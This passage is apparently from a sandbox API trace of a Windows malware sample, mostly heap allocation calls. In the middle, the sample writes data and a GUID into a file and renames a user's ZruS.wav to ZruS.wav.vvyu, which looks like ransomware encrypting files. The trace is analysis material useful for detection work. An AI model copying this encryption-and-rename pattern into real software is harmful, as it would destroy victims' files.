Flags=0x0, Size=0xc) returned 0x2d39730 [0187.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39748 [0187.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39730 | out: hHeap=0x6a0000) returned 1 [0187.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39730 [0187.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0187.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0187.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396a0 [0187.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0187.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39748 | out: hHeap=0x6a0000) returned 1 [0187.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0187.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0187.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0187.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0187.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39730 | out: hHeap=0x6a0000) returned 1 [0187.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39700 | out: hHeap=0x6a0000) returned 1 [0187.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396e8 | out: hHeap=0x6a0000) returned 1 [0187.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0187.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0187.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.102] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x474a, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x474a, lpOverlapped=0x0) returned 1 [0187.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0187.103] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x474f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.103] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.104] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.105] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.105] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.105] CloseHandle (hObject=0x584) returned 1 [0187.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0187.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.107] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\ZruS.wav" (normalized: "c:\\users\\keecfmwgj\\music\\zrus.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\ZruS.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\zrus.wav.vvyu")) returned 1 [0187.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.108] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.112] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3b29d0, ftCreationTime.dwHighDateTime=0x1d8a391, ftLastAccessTime.dwLowDateTime=0x8434e940, ftLastAccessTime.dwHighDateTime=0x1d8a462, ftLastWriteTime.dwLowDateTime=0x8434e940, ftLastWriteTime.dwHighDateTime=0x1d8a462, nFileSizeHigh=0x0, nFileSizeLow=0x474f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZruS.wav", cAlternateFileName="")) returned 0 [0187.112] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0187.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0187.112] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0187.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0187.113] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0187.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0187.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0187.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: 